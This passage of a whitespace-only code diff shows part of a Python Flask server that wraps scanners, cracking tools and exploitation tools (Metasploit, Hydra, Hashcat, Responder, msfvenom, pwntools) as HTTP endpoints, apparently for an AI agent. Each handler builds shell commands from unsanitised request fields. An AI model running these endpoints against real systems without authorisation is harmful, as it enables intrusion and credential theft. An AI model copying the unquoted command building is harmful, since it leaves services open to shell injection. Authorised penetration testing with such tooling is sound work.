additional_args = params.get("additional_args", "") - + command = "docker-bench-security" - + if checks: command += f" -c {checks}" - + if exclude: command += f" -e {exclude}" - + if output_file: command += f" -l {output_file}" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿณ Starting Docker Bench Security assessment") result = execute_command(command) result["output_file"] = output_file @@ -8956,23 +8956,23 @@ def clair(): config = params.get("config", "/etc/clair/config.yaml") output_format = params.get("output_format", "json") additional_args = params.get("additional_args", "") - + if not image: logger.warning("๐Ÿณ Clair called without image parameter") return jsonify({"error": "Image parameter is required"}), 400 - + # Use clairctl for scanning command = f"clairctl analyze {image}" - + if config: command += f" --config {config}" - + if output_format: command += f" --format {output_format}" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿณ Starting Clair vulnerability scan: {image}") result = execute_command(command) logger.info(f"๐Ÿ“Š Clair scan completed for {image}") @@ -8991,21 +8991,21 @@ def falco(): output_format = params.get("output_format", "json") duration = params.get("duration", 60) # seconds additional_args = params.get("additional_args", "") - + command = f"timeout {duration} falco" - + if config_file: command += f" --config {config_file}" - + if rules_file: command += f" --rules {rules_file}" - + if output_format == "json": command += " --json" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ›ก๏ธ Starting Falco runtime monitoring for {duration}s") result = execute_command(command) logger.info(f"๐Ÿ“Š Falco monitoring completed") @@ -9025,24 +9025,24 @@ def checkov(): skip_check = params.get("skip_check", "") output_format = params.get("output_format", "json") additional_args = params.get("additional_args", "") - + command = f"checkov -d {directory}" - + if framework: command += f" --framework {framework}" - + if check: command += f" --check {check}" - + if skip_check: command += f" --skip-check {skip_check}" - + if output_format: command += f" --output {output_format}" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ” Starting Checkov IaC scan: {directory}") result = execute_command(command) logger.info(f"๐Ÿ“Š Checkov scan completed") @@ -9062,21 +9062,21 @@ def terrascan(): output_format = params.get("output_format", "json") severity = params.get("severity", "") additional_args = params.get("additional_args", "") - + command = f"terrascan scan -t {scan_type} -d {iac_dir}" - + if policy_type: command += f" -p {policy_type}" - + if output_format: command += f" -o {output_format}" - + if severity: command += f" --severity {severity}" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ” Starting Terrascan IaC scan: {iac_dir}") result = execute_command(command) logger.info(f"๐Ÿ“Š Terrascan scan completed") @@ -9093,18 +9093,18 @@ def dirb(): url = params.get("url", "") wordlist = params.get("wordlist", "/usr/share/wordlists/dirb/common.txt") additional_args = params.get("additional_args", "") - + if not url: logger.warning("๐ŸŒ Dirb called without URL parameter") return jsonify({ "error": "URL parameter is required" }), 400 - + command = f"dirb {url} {wordlist}" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ“ Starting Dirb scan: {url}") result = execute_command(command) logger.info(f"๐Ÿ“Š Dirb scan 
completed for {url}") @@ -9122,18 +9122,18 @@ def nikto(): params = request.json target = params.get("target", "") additional_args = params.get("additional_args", "") - + if not target: logger.warning("๐ŸŽฏ Nikto called without target parameter") return jsonify({ "error": "Target parameter is required" }), 400 - + command = f"nikto -h {target}" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ”ฌ Starting Nikto scan: {target}") result = execute_command(command) logger.info(f"๐Ÿ“Š Nikto scan completed for {target}") @@ -9152,21 +9152,21 @@ def sqlmap(): url = params.get("url", "") data = params.get("data", "") additional_args = params.get("additional_args", "") - + if not url: logger.warning("๐ŸŽฏ SQLMap called without URL parameter") return jsonify({ "error": "URL parameter is required" }), 400 - + command = f"sqlmap -u {url} --batch" - + if data: command += f" --data=\"{data}\"" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ’‰ Starting SQLMap scan: {url}") result = execute_command(command) logger.info(f"๐Ÿ“Š SQLMap scan completed for {url}") @@ -9184,35 +9184,35 @@ def metasploit(): params = request.json module = params.get("module", "") options = params.get("options", {}) - + if not module: logger.warning("๐Ÿš€ Metasploit called without module parameter") return jsonify({ "error": "Module parameter is required" }), 400 - + # Create an MSF resource script resource_content = f"use {module}\n" for key, value in options.items(): resource_content += f"set {key} {value}\n" resource_content += "exploit\n" - + # Save resource script to a temporary file resource_file = "/tmp/mcp_msf_resource.rc" with open(resource_file, "w") as f: f.write(resource_content) - + command = f"msfconsole -q -r {resource_file}" - + logger.info(f"๐Ÿš€ Starting Metasploit module: {module}") result = execute_command(command) - + # Clean up the temporary file try: os.remove(resource_file) except Exception as e: logger.warning(f"Error removing temporary resource file: {str(e)}") - + logger.info(f"๐Ÿ“Š Metasploit module completed: {module}") return jsonify(result) except Exception as e: @@ -9233,36 +9233,36 @@ def hydra(): password = params.get("password", "") password_file = params.get("password_file", "") additional_args = params.get("additional_args", "") - + if not target or not service: logger.warning("๐ŸŽฏ Hydra called without target or service parameter") return jsonify({ "error": "Target and service parameters are required" }), 400 - + if not (username or username_file) or not (password or password_file): logger.warning("๐Ÿ”‘ Hydra called without username/password parameters") return jsonify({ "error": "Username/username_file and password/password_file are required" }), 400 - + command = f"hydra -t 4" - + if username: command += f" -l {username}" elif username_file: command += f" -L {username_file}" - + if password: command += f" -p {password}" elif password_file: command += f" -P {password_file}" - + if additional_args: command += f" {additional_args}" - + command += f" {target} {service}" - + logger.info(f"๐Ÿ”‘ Starting Hydra attack: {target}:{service}") result = execute_command(command) logger.info(f"๐Ÿ“Š Hydra attack completed for {target}") @@ -9282,26 +9282,26 @@ def john(): wordlist = params.get("wordlist", "/usr/share/wordlists/rockyou.txt") format_type = params.get("format", "") additional_args = params.get("additional_args", "") - + if not hash_file: logger.warning("๐Ÿ” John called without hash_file parameter") return jsonify({ "error": "Hash file 
parameter is required" }), 400 - + command = f"john" - + if format_type: command += f" --format={format_type}" - + if wordlist: command += f" --wordlist={wordlist}" - + if additional_args: command += f" {additional_args}" - + command += f" {hash_file}" - + logger.info(f"๐Ÿ” Starting John the Ripper: {hash_file}") result = execute_command(command) logger.info(f"๐Ÿ“Š John the Ripper completed") @@ -9319,18 +9319,18 @@ def wpscan(): params = request.json url = params.get("url", "") additional_args = params.get("additional_args", "") - + if not url: logger.warning("๐ŸŒ WPScan called without URL parameter") return jsonify({ "error": "URL parameter is required" }), 400 - + command = f"wpscan --url {url}" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ” Starting WPScan: {url}") result = execute_command(command) logger.info(f"๐Ÿ“Š WPScan completed for {url}") @@ -9348,15 +9348,15 @@ def enum4linux(): params = request.json target = params.get("target", "") additional_args = params.get("additional_args", "-a") - + if not target: logger.warning("๐ŸŽฏ Enum4linux called without target parameter") return jsonify({ "error": "Target parameter is required" }), 400 - + command = f"enum4linux {additional_args} {target}" - + logger.info(f"๐Ÿ” Starting Enum4linux: {target}") result = execute_command(command) logger.info(f"๐Ÿ“Š Enum4linux completed for {target}") @@ -9377,15 +9377,15 @@ def ffuf(): mode = params.get("mode", "directory") match_codes = params.get("match_codes", "200,204,301,302,307,401,403") additional_args = params.get("additional_args", "") - + if not url: logger.warning("๐ŸŒ FFuf called without URL parameter") return jsonify({ "error": "URL parameter is required" }), 400 - + command = f"ffuf" - + if mode == "directory": command += f" -u {url}/FUZZ -w {wordlist}" elif mode == "vhost": @@ -9394,12 +9394,12 @@ def ffuf(): command += f" -u {url}?FUZZ=value -w {wordlist}" else: command += f" -u {url} -w {wordlist}" - + command += f" -mc {match_codes}" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ” Starting FFuf {mode} fuzzing: {url}") result = execute_command(command) logger.info(f"๐Ÿ“Š FFuf fuzzing completed for {url}") @@ -9422,30 +9422,30 @@ def netexec(): hash_value = params.get("hash", "") module = params.get("module", "") additional_args = params.get("additional_args", "") - + if not target: logger.warning("๐ŸŽฏ NetExec called without target parameter") return jsonify({ "error": "Target parameter is required" }), 400 - + command = f"nxc {protocol} {target}" - + if username: command += f" -u {username}" - + if password: command += f" -p {password}" - + if hash_value: command += f" -H {hash_value}" - + if module: command += f" -M {module}" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ” Starting NetExec {protocol} scan: {target}") result = execute_command(command) logger.info(f"๐Ÿ“Š NetExec scan completed for {target}") @@ -9464,23 +9464,23 @@ def amass(): domain = params.get("domain", "") mode = params.get("mode", "enum") additional_args = params.get("additional_args", "") - + if not domain: logger.warning("๐ŸŒ Amass called without domain parameter") return jsonify({ "error": "Domain parameter is required" }), 400 - + command = f"amass {mode}" - + if mode == "enum": command += f" -d {domain}" else: command += f" -d {domain}" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ” Starting Amass {mode}: {domain}") result = execute_command(command) logger.info(f"๐Ÿ“Š Amass 
completed for {domain}") @@ -9502,29 +9502,29 @@ def hashcat(): wordlist = params.get("wordlist", "/usr/share/wordlists/rockyou.txt") mask = params.get("mask", "") additional_args = params.get("additional_args", "") - + if not hash_file: logger.warning("๐Ÿ” Hashcat called without hash_file parameter") return jsonify({ "error": "Hash file parameter is required" }), 400 - + if not hash_type: logger.warning("๐Ÿ” Hashcat called without hash_type parameter") return jsonify({ "error": "Hash type parameter is required" }), 400 - + command = f"hashcat -m {hash_type} -a {attack_mode} {hash_file}" - + if attack_mode == "0" and wordlist: command += f" {wordlist}" elif attack_mode == "3" and mask: command += f" {mask}" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ” Starting Hashcat attack: mode {attack_mode}") result = execute_command(command) logger.info(f"๐Ÿ“Š Hashcat attack completed") @@ -9544,24 +9544,24 @@ def subfinder(): silent = params.get("silent", True) all_sources = params.get("all_sources", False) additional_args = params.get("additional_args", "") - + if not domain: logger.warning("๐ŸŒ Subfinder called without domain parameter") return jsonify({ "error": "Domain parameter is required" }), 400 - + command = f"subfinder -d {domain}" - + if silent: command += " -silent" - + if all_sources: command += " -all" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ” Starting Subfinder: {domain}") result = execute_command(command) logger.info(f"๐Ÿ“Š Subfinder completed for {domain}") @@ -9582,27 +9582,27 @@ def smbmap(): password = params.get("password", "") domain = params.get("domain", "") additional_args = params.get("additional_args", "") - + if not target: logger.warning("๐ŸŽฏ SMBMap called without target parameter") return jsonify({ "error": "Target parameter is required" }), 400 - + command = f"smbmap -H {target}" - + if username: command += f" -u {username}" - + if password: command += f" -p {password}" - + if domain: command += f" -d {domain}" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ” Starting SMBMap: {target}") result = execute_command(command) logger.info(f"๐Ÿ“Š SMBMap completed for {target}") @@ -9629,22 +9629,22 @@ def rustscan(): timeout = params.get("timeout", 1500) scripts = params.get("scripts", "") additional_args = params.get("additional_args", "") - + if not target: logger.warning("๐ŸŽฏ Rustscan called without target parameter") return jsonify({"error": "Target parameter is required"}), 400 - + command = f"rustscan -a {target} --ulimit {ulimit} -b {batch_size} -t {timeout}" - + if ports: command += f" -p {ports}" - + if scripts: command += f" -- -sC -sV" - + if additional_args: command += f" {additional_args}" - + logger.info(f"โšก Starting Rustscan: {target}") result = execute_command(command) logger.info(f"๐Ÿ“Š Rustscan completed for {target}") @@ -9666,28 +9666,28 @@ def masscan(): source_ip = params.get("source_ip", "") banners = params.get("banners", False) additional_args = params.get("additional_args", "") - + if not target: logger.warning("๐ŸŽฏ Masscan called without target parameter") return jsonify({"error": "Target parameter is required"}), 400 - + command = f"masscan {target} -p{ports} --rate={rate}" - + if interface: command += f" -e {interface}" - + if router_mac: command += f" --router-mac {router_mac}" - + if source_ip: command += f" --source-ip {source_ip}" - + if banners: command += " --banners" - + if additional_args: command += f" {additional_args}" - + 
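Every handler in this region splices raw JSON fields straight into a shell string (`command += f" {additional_args}"`), so a target value like `10.0.0.1; id` would be parsed by the shell as a second command. As a minimal sketch only, assuming the same string-based `execute_command` path, the illustrative `quoted` helper below shows how `shlex.quote` could neutralise each request-derived token; the helper and variable names are ours for illustration, not part of this diff.

```python
# Hedged sketch: quoting request-derived values before they reach a shell.
# The handlers above interpolate raw JSON fields into command strings, so a
# value like "10.0.0.1; rm -rf /" would otherwise run as two commands.
import shlex

def quoted(value) -> str:
    """Render a user-derived value as a single, safely quoted shell token."""
    return shlex.quote(str(value))

# Stand-ins for params.get(...) in the masscan handler above:
target, ports, rate = "10.0.0.0/24", "1-1000", 1000
command = f"masscan {quoted(target)} -p{quoted(ports)} --rate={quoted(rate)}"

# Caveat: quoting collapses additional_args into ONE token; multi-flag input
# needs shlex.split() first, then per-token quoting.
additional_args = "--banners"
if additional_args:
    command += " " + " ".join(quoted(t) for t in shlex.split(additional_args))

print(command)  # masscan 10.0.0.0/24 -p1-1000 --rate=1000 --banners
```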
logger.info(f"๐Ÿš€ Starting Masscan: {target} at rate {rate}") result = execute_command(command) logger.info(f"๐Ÿ“Š Masscan completed for {target}") @@ -9711,38 +9711,38 @@ def nmap_advanced(): aggressive = params.get("aggressive", False) stealth = params.get("stealth", False) additional_args = params.get("additional_args", "") - + if not target: logger.warning("๐ŸŽฏ Advanced Nmap called without target parameter") return jsonify({"error": "Target parameter is required"}), 400 - + command = f"nmap {scan_type} {target}" - + if ports: command += f" -p {ports}" - + if stealth: command += " -T2 -f --mtu 24" else: command += f" -{timing}" - + if os_detection: command += " -O" - + if version_detection: command += " -sV" - + if aggressive: command += " -A" - + if nse_scripts: command += f" --script={nse_scripts}" elif not aggressive: # Default useful scripts if not aggressive command += " --script=default,discovery,safe" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ” Starting Advanced Nmap: {target}") result = execute_command(command) logger.info(f"๐Ÿ“Š Advanced Nmap completed for {target}") @@ -9763,22 +9763,22 @@ def autorecon(): heartbeat = params.get("heartbeat", 60) timeout = params.get("timeout", 300) additional_args = params.get("additional_args", "") - + if not target: logger.warning("๐ŸŽฏ AutoRecon called without target parameter") return jsonify({"error": "Target parameter is required"}), 400 - + command = f"autorecon {target} -o {output_dir} --heartbeat {heartbeat} --timeout {timeout}" - + if port_scans != "default": command += f" --port-scans {port_scans}" - + if service_scans != "default": command += f" --service-scans {service_scans}" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ”„ Starting AutoRecon: {target}") result = execute_command(command) logger.info(f"๐Ÿ“Š AutoRecon completed for {target}") @@ -9801,22 +9801,22 @@ def enum4linux_ng(): groups = params.get("groups", True) policy = params.get("policy", True) additional_args = params.get("additional_args", "") - + if not target: logger.warning("๐ŸŽฏ Enum4linux-ng called without target parameter") return jsonify({"error": "Target parameter is required"}), 400 - + command = f"enum4linux-ng {target}" - + if username: command += f" -u {username}" - + if password: command += f" -p {password}" - + if domain: command += f" -d {domain}" - + # Add specific enumeration options enum_options = [] if shares: @@ -9827,13 +9827,13 @@ def enum4linux_ng(): enum_options.append("G") if policy: enum_options.append("P") - + if enum_options: command += f" -A {','.join(enum_options)}" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ” Starting Enum4linux-ng: {target}") result = execute_command(command) logger.info(f"๐Ÿ“Š Enum4linux-ng completed for {target}") @@ -9853,11 +9853,11 @@ def rpcclient(): domain = params.get("domain", "") commands = params.get("commands", "enumdomusers;enumdomgroups;querydominfo") additional_args = params.get("additional_args", "") - + if not target: logger.warning("๐ŸŽฏ rpcclient called without target parameter") return jsonify({"error": "Target parameter is required"}), 400 - + # Build authentication string auth_string = "" if username and password: @@ -9866,18 +9866,18 @@ def rpcclient(): auth_string = f"-U {username}" else: auth_string = "-U ''" # Anonymous - + if domain: auth_string += f" -W {domain}" - + # Create command sequence command_sequence = commands.replace(";", "\n") - + command = f"echo -e '{command_sequence}' | 
rpcclient {auth_string} {target}" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ” Starting rpcclient: {target}") result = execute_command(command) logger.info(f"๐Ÿ“Š rpcclient completed for {target}") @@ -9895,21 +9895,21 @@ def nbtscan(): verbose = params.get("verbose", False) timeout = params.get("timeout", 2) additional_args = params.get("additional_args", "") - + if not target: logger.warning("๐ŸŽฏ nbtscan called without target parameter") return jsonify({"error": "Target parameter is required"}), 400 - + command = f"nbtscan -t {timeout}" - + if verbose: command += " -v" - + command += f" {target}" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ” Starting nbtscan: {target}") result = execute_command(command) logger.info(f"๐Ÿ“Š nbtscan completed for {target}") @@ -9929,24 +9929,24 @@ def arp_scan(): timeout = params.get("timeout", 500) retry = params.get("retry", 3) additional_args = params.get("additional_args", "") - + if not target and not local_network: logger.warning("๐ŸŽฏ arp-scan called without target parameter") return jsonify({"error": "Target parameter or local_network flag is required"}), 400 - + command = f"arp-scan -t {timeout} -r {retry}" - + if interface: command += f" -I {interface}" - + if local_network: command += " -l" else: command += f" {target}" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ” Starting arp-scan: {target if target else 'local network'}") result = execute_command(command) logger.info(f"๐Ÿ“Š arp-scan completed") @@ -9967,28 +9967,28 @@ def responder(): fingerprint = params.get("fingerprint", False) duration = params.get("duration", 300) # 5 minutes default additional_args = params.get("additional_args", "") - + if not interface: logger.warning("๐ŸŽฏ Responder called without interface parameter") return jsonify({"error": "Interface parameter is required"}), 400 - + command = f"timeout {duration} responder -I {interface}" - + if analyze: command += " -A" - + if wpad: command += " -w" - + if force_wpad_auth: command += " -F" - + if fingerprint: command += " -f" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ” Starting Responder on interface: {interface}") result = execute_command(command) logger.info(f"๐Ÿ“Š Responder completed") @@ -10006,29 +10006,29 @@ def volatility(): plugin = params.get("plugin", "") profile = params.get("profile", "") additional_args = params.get("additional_args", "") - + if not memory_file: logger.warning("๐Ÿง  Volatility called without memory_file parameter") return jsonify({ "error": "Memory file parameter is required" }), 400 - + if not plugin: logger.warning("๐Ÿง  Volatility called without plugin parameter") return jsonify({ "error": "Plugin parameter is required" }), 400 - + command = f"volatility -f {memory_file}" - + if profile: command += f" --profile={profile}" - + command += f" {plugin}" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿง  Starting Volatility analysis: {plugin}") result = execute_command(command) logger.info(f"๐Ÿ“Š Volatility analysis completed") @@ -10050,30 +10050,30 @@ def msfvenom(): encoder = params.get("encoder", "") iterations = params.get("iterations", "") additional_args = params.get("additional_args", "") - + if not payload: logger.warning("๐Ÿš€ MSFVenom called without payload parameter") return jsonify({ "error": "Payload parameter is required" }), 400 - + command = f"msfvenom -p {payload}" - + if format_type: command += f" -f {format_type}" - 
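The Responder handler above bounds its runtime by prefixing the external `timeout` utility onto the shell string. A hedged alternative sketch, assuming only that the tool binary is on `PATH`: `subprocess.run` with a list argv and its native `timeout=` keyword gives the same wall-clock bound without shell parsing or an extra process; the wrapper name and example argv are illustrative, not part of the diff.

```python
# Minimal sketch: a list argv avoids shell parsing entirely, and timeout=
# replaces the external `timeout {duration}` prefix used above.
import subprocess

def run_bounded(argv, duration):
    """Run a tool with a hard wall-clock limit and capture its output."""
    try:
        proc = subprocess.run(argv, capture_output=True, text=True, timeout=duration)
        return {"success": proc.returncode == 0,
                "stdout": proc.stdout, "stderr": proc.stderr}
    except subprocess.TimeoutExpired as exc:
        # Partial output is still useful for long-running listeners like
        # Responder. Depending on Python version exc.stdout may be bytes.
        out = exc.stdout.decode() if isinstance(exc.stdout, bytes) else (exc.stdout or "")
        err = exc.stderr.decode() if isinstance(exc.stderr, bytes) else (exc.stderr or "")
        return {"success": False, "timed_out": True, "stdout": out, "stderr": err}

# e.g. run_bounded(["responder", "-I", "eth0", "-A"], duration=300)
```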
+ if output_file: command += f" -o {output_file}" - + if encoder: command += f" -e {encoder}" - + if iterations: command += f" -i {iterations}" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿš€ Starting MSFVenom payload generation: {payload}") result = execute_command(command) logger.info(f"๐Ÿ“Š MSFVenom payload generated") @@ -10097,38 +10097,38 @@ def gdb(): commands = params.get("commands", "") script_file = params.get("script_file", "") additional_args = params.get("additional_args", "") - + if not binary: logger.warning("๐Ÿ”ง GDB called without binary parameter") return jsonify({ "error": "Binary parameter is required" }), 400 - + command = f"gdb {binary}" - + if script_file: command += f" -x {script_file}" - + if commands: temp_script = "/tmp/gdb_commands.txt" with open(temp_script, "w") as f: f.write(commands) command += f" -x {temp_script}" - + if additional_args: command += f" {additional_args}" - + command += " -batch" - + logger.info(f"๐Ÿ”ง Starting GDB analysis: {binary}") result = execute_command(command) - + if commands and os.path.exists("/tmp/gdb_commands.txt"): try: os.remove("/tmp/gdb_commands.txt") except: pass - + logger.info(f"๐Ÿ“Š GDB analysis completed for {binary}") return jsonify(result) except Exception as e: @@ -10145,13 +10145,13 @@ def radare2(): binary = params.get("binary", "") commands = params.get("commands", "") additional_args = params.get("additional_args", "") - + if not binary: logger.warning("๐Ÿ”ง Radare2 called without binary parameter") return jsonify({ "error": "Binary parameter is required" }), 400 - + if commands: temp_script = "/tmp/r2_commands.txt" with open(temp_script, "w") as f: @@ -10159,19 +10159,19 @@ def radare2(): command = f"r2 -i {temp_script} -q {binary}" else: command = f"r2 -q {binary}" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ”ง Starting Radare2 analysis: {binary}") result = execute_command(command) - + if commands and os.path.exists("/tmp/r2_commands.txt"): try: os.remove("/tmp/r2_commands.txt") except: pass - + logger.info(f"๐Ÿ“Š Radare2 analysis completed for {binary}") return jsonify(result) except Exception as e: @@ -10188,23 +10188,23 @@ def binwalk(): file_path = params.get("file_path", "") extract = params.get("extract", False) additional_args = params.get("additional_args", "") - + if not file_path: logger.warning("๐Ÿ”ง Binwalk called without file_path parameter") return jsonify({ "error": "File path parameter is required" }), 400 - + command = f"binwalk" - + if extract: command += " -e" - + if additional_args: command += f" {additional_args}" - + command += f" {file_path}" - + logger.info(f"๐Ÿ”ง Starting Binwalk analysis: {file_path}") result = execute_command(command) logger.info(f"๐Ÿ“Š Binwalk analysis completed for {file_path}") @@ -10223,21 +10223,21 @@ def ropgadget(): binary = params.get("binary", "") gadget_type = params.get("gadget_type", "") additional_args = params.get("additional_args", "") - + if not binary: logger.warning("๐Ÿ”ง ROPgadget called without binary parameter") return jsonify({ "error": "Binary parameter is required" }), 400 - + command = f"ROPgadget --binary {binary}" - + if gadget_type: command += f" --only '{gadget_type}'" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ”ง Starting ROPgadget search: {binary}") result = execute_command(command) logger.info(f"๐Ÿ“Š ROPgadget search completed for {binary}") @@ -10254,15 +10254,15 @@ def checksec(): try: params = request.json binary = params.get("binary", 
"") - + if not binary: logger.warning("๐Ÿ”ง Checksec called without binary parameter") return jsonify({ "error": "Binary parameter is required" }), 400 - + command = f"checksec --file={binary}" - + logger.info(f"๐Ÿ”ง Starting Checksec analysis: {binary}") result = execute_command(command) logger.info(f"๐Ÿ“Š Checksec analysis completed for {binary}") @@ -10282,23 +10282,23 @@ def xxd(): offset = params.get("offset", "0") length = params.get("length", "") additional_args = params.get("additional_args", "") - + if not file_path: logger.warning("๐Ÿ”ง XXD called without file_path parameter") return jsonify({ "error": "File path parameter is required" }), 400 - + command = f"xxd -s {offset}" - + if length: command += f" -l {length}" - + if additional_args: command += f" {additional_args}" - + command += f" {file_path}" - + logger.info(f"๐Ÿ”ง Starting XXD hex dump: {file_path}") result = execute_command(command) logger.info(f"๐Ÿ“Š XXD hex dump completed for {file_path}") @@ -10317,20 +10317,20 @@ def strings(): file_path = params.get("file_path", "") min_len = params.get("min_len", 4) additional_args = params.get("additional_args", "") - + if not file_path: logger.warning("๐Ÿ”ง Strings called without file_path parameter") return jsonify({ "error": "File path parameter is required" }), 400 - + command = f"strings -n {min_len}" - + if additional_args: command += f" {additional_args}" - + command += f" {file_path}" - + logger.info(f"๐Ÿ”ง Starting Strings extraction: {file_path}") result = execute_command(command) logger.info(f"๐Ÿ“Š Strings extraction completed for {file_path}") @@ -10349,25 +10349,25 @@ def objdump(): binary = params.get("binary", "") disassemble = params.get("disassemble", True) additional_args = params.get("additional_args", "") - + if not binary: logger.warning("๐Ÿ”ง Objdump called without binary parameter") return jsonify({ "error": "Binary parameter is required" }), 400 - + command = f"objdump" - + if disassemble: command += " -d" else: command += " -x" - + if additional_args: command += f" {additional_args}" - + command += f" {binary}" - + logger.info(f"๐Ÿ”ง Starting Objdump analysis: {binary}") result = execute_command(command) logger.info(f"๐Ÿ“Š Objdump analysis completed for {binary}") @@ -10393,27 +10393,27 @@ def ghidra(): analysis_timeout = params.get("analysis_timeout", 300) output_format = params.get("output_format", "xml") additional_args = params.get("additional_args", "") - + if not binary: logger.warning("๐Ÿ”ง Ghidra called without binary parameter") return jsonify({"error": "Binary parameter is required"}), 400 - + # Create Ghidra project directory project_dir = f"/tmp/ghidra_projects/{project_name}" os.makedirs(project_dir, exist_ok=True) - + # Base Ghidra command for headless analysis command = f"analyzeHeadless {project_dir} {project_name} -import {binary} -deleteProject" - + if script_file: command += f" -postScript {script_file}" - + if output_format == "xml": command += f" -postScript ExportXml.java {project_dir}/analysis.xml" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ”ง Starting Ghidra analysis: {binary}") result = execute_command(command, timeout=analysis_timeout) logger.info(f"๐Ÿ“Š Ghidra analysis completed for {binary}") @@ -10433,14 +10433,14 @@ def pwntools(): target_port = params.get("target_port", 0) exploit_type = params.get("exploit_type", "local") # local, remote, format_string, rop additional_args = params.get("additional_args", "") - + if not script_content and not target_binary: logger.warning("๐Ÿ”ง Pwntools 
called without script content or target binary") return jsonify({"error": "Script content or target binary is required"}), 400 - + # Create temporary Python script script_file = "/tmp/pwntools_exploit.py" - + if script_content: # Use provided script content with open(script_file, "w") as f: @@ -10476,21 +10476,21 @@ p.interactive() """ with open(script_file, "w") as f: f.write(template) - + command = f"python3 {script_file}" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ”ง Starting Pwntools exploit: {exploit_type}") result = execute_command(command) - + # Cleanup try: os.remove(script_file) except: pass - + logger.info(f"๐Ÿ“Š Pwntools exploit completed") return jsonify(result) except Exception as e: @@ -10505,16 +10505,16 @@ def one_gadget(): libc_path = params.get("libc_path", "") level = params.get("level", 1) # 0, 1, 2 for different constraint levels additional_args = params.get("additional_args", "") - + if not libc_path: logger.warning("๐Ÿ”ง one_gadget called without libc_path parameter") return jsonify({"error": "libc_path parameter is required"}), 400 - + command = f"one_gadget {libc_path} --level {level}" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ”ง Starting one_gadget analysis: {libc_path}") result = execute_command(command) logger.info(f"๐Ÿ“Š one_gadget analysis completed") @@ -10532,18 +10532,18 @@ def libc_database(): symbols = params.get("symbols", "") # format: "symbol1:offset1 symbol2:offset2" libc_id = params.get("libc_id", "") additional_args = params.get("additional_args", "") - + if action == "find" and not symbols: logger.warning("๐Ÿ”ง libc-database find called without symbols") return jsonify({"error": "Symbols parameter is required for find action"}), 400 - + if action in ["dump", "download"] and not libc_id: logger.warning("๐Ÿ”ง libc-database called without libc_id for dump/download") return jsonify({"error": "libc_id parameter is required for dump/download actions"}), 400 - + # Navigate to libc-database directory (assuming it's installed) base_command = "cd /opt/libc-database 2>/dev/null || cd ~/libc-database 2>/dev/null || echo 'libc-database not found'" - + if action == "find": command = f"{base_command} && ./find {symbols}" elif action == "dump": @@ -10552,10 +10552,10 @@ def libc_database(): command = f"{base_command} && ./download {libc_id}" else: return jsonify({"error": f"Invalid action: {action}"}), 400 - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ”ง Starting libc-database {action}: {symbols or libc_id}") result = execute_command(command) logger.info(f"๐Ÿ“Š libc-database {action} completed") @@ -10574,23 +10574,23 @@ def gdb_peda(): attach_pid = params.get("attach_pid", 0) core_file = params.get("core_file", "") additional_args = params.get("additional_args", "") - + if not binary and not attach_pid and not core_file: logger.warning("๐Ÿ”ง GDB-PEDA called without binary, PID, or core file") return jsonify({"error": "Binary, PID, or core file parameter is required"}), 400 - + # Base GDB command with PEDA command = "gdb -q" - + if binary: command += f" {binary}" - + if core_file: command += f" {core_file}" - + if attach_pid: command += f" -p {attach_pid}" - + # Create command script if commands: temp_script = "/tmp/gdb_peda_commands.txt" @@ -10605,21 +10605,21 @@ quit else: # Default PEDA initialization command += " -ex 'source ~/peda/peda.py' -ex 'quit'" - + if additional_args: command += f" {additional_args}" - + target_info = binary or f'PID {attach_pid}' or 
core_file logger.info(f"๐Ÿ”ง Starting GDB-PEDA analysis: {target_info}") result = execute_command(command) - + # Cleanup if commands and os.path.exists("/tmp/gdb_peda_commands.txt"): try: os.remove("/tmp/gdb_peda_commands.txt") except: pass - + logger.info(f"๐Ÿ“Š GDB-PEDA analysis completed") return jsonify(result) except Exception as e: @@ -10637,14 +10637,14 @@ def angr(): avoid_addresses = params.get("avoid_addresses", "") analysis_type = params.get("analysis_type", "symbolic") # symbolic, cfg, static additional_args = params.get("additional_args", "") - + if not binary: logger.warning("๐Ÿ”ง angr called without binary parameter") return jsonify({"error": "Binary parameter is required"}), 400 - + # Create angr script script_file = "/tmp/angr_analysis.py" - + if script_content: with open(script_file, "w") as f: f.write(script_content) @@ -10693,24 +10693,24 @@ print(f"CFG edges: {len(cfg.graph.edges())}") for func_addr, func in cfg.functions.items(): print(f"Function: {func.name} at {hex(func_addr)}") """ - + with open(script_file, "w") as f: f.write(template) - + command = f"python3 {script_file}" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ”ง Starting angr analysis: {binary}") result = execute_command(command, timeout=600) # Longer timeout for symbolic execution - + # Cleanup try: os.remove(script_file) except: pass - + logger.info(f"๐Ÿ“Š angr analysis completed") return jsonify(result) except Exception as e: @@ -10728,13 +10728,13 @@ def ropper(): arch = params.get("arch", "") # x86, x86_64, arm, etc. search_string = params.get("search_string", "") additional_args = 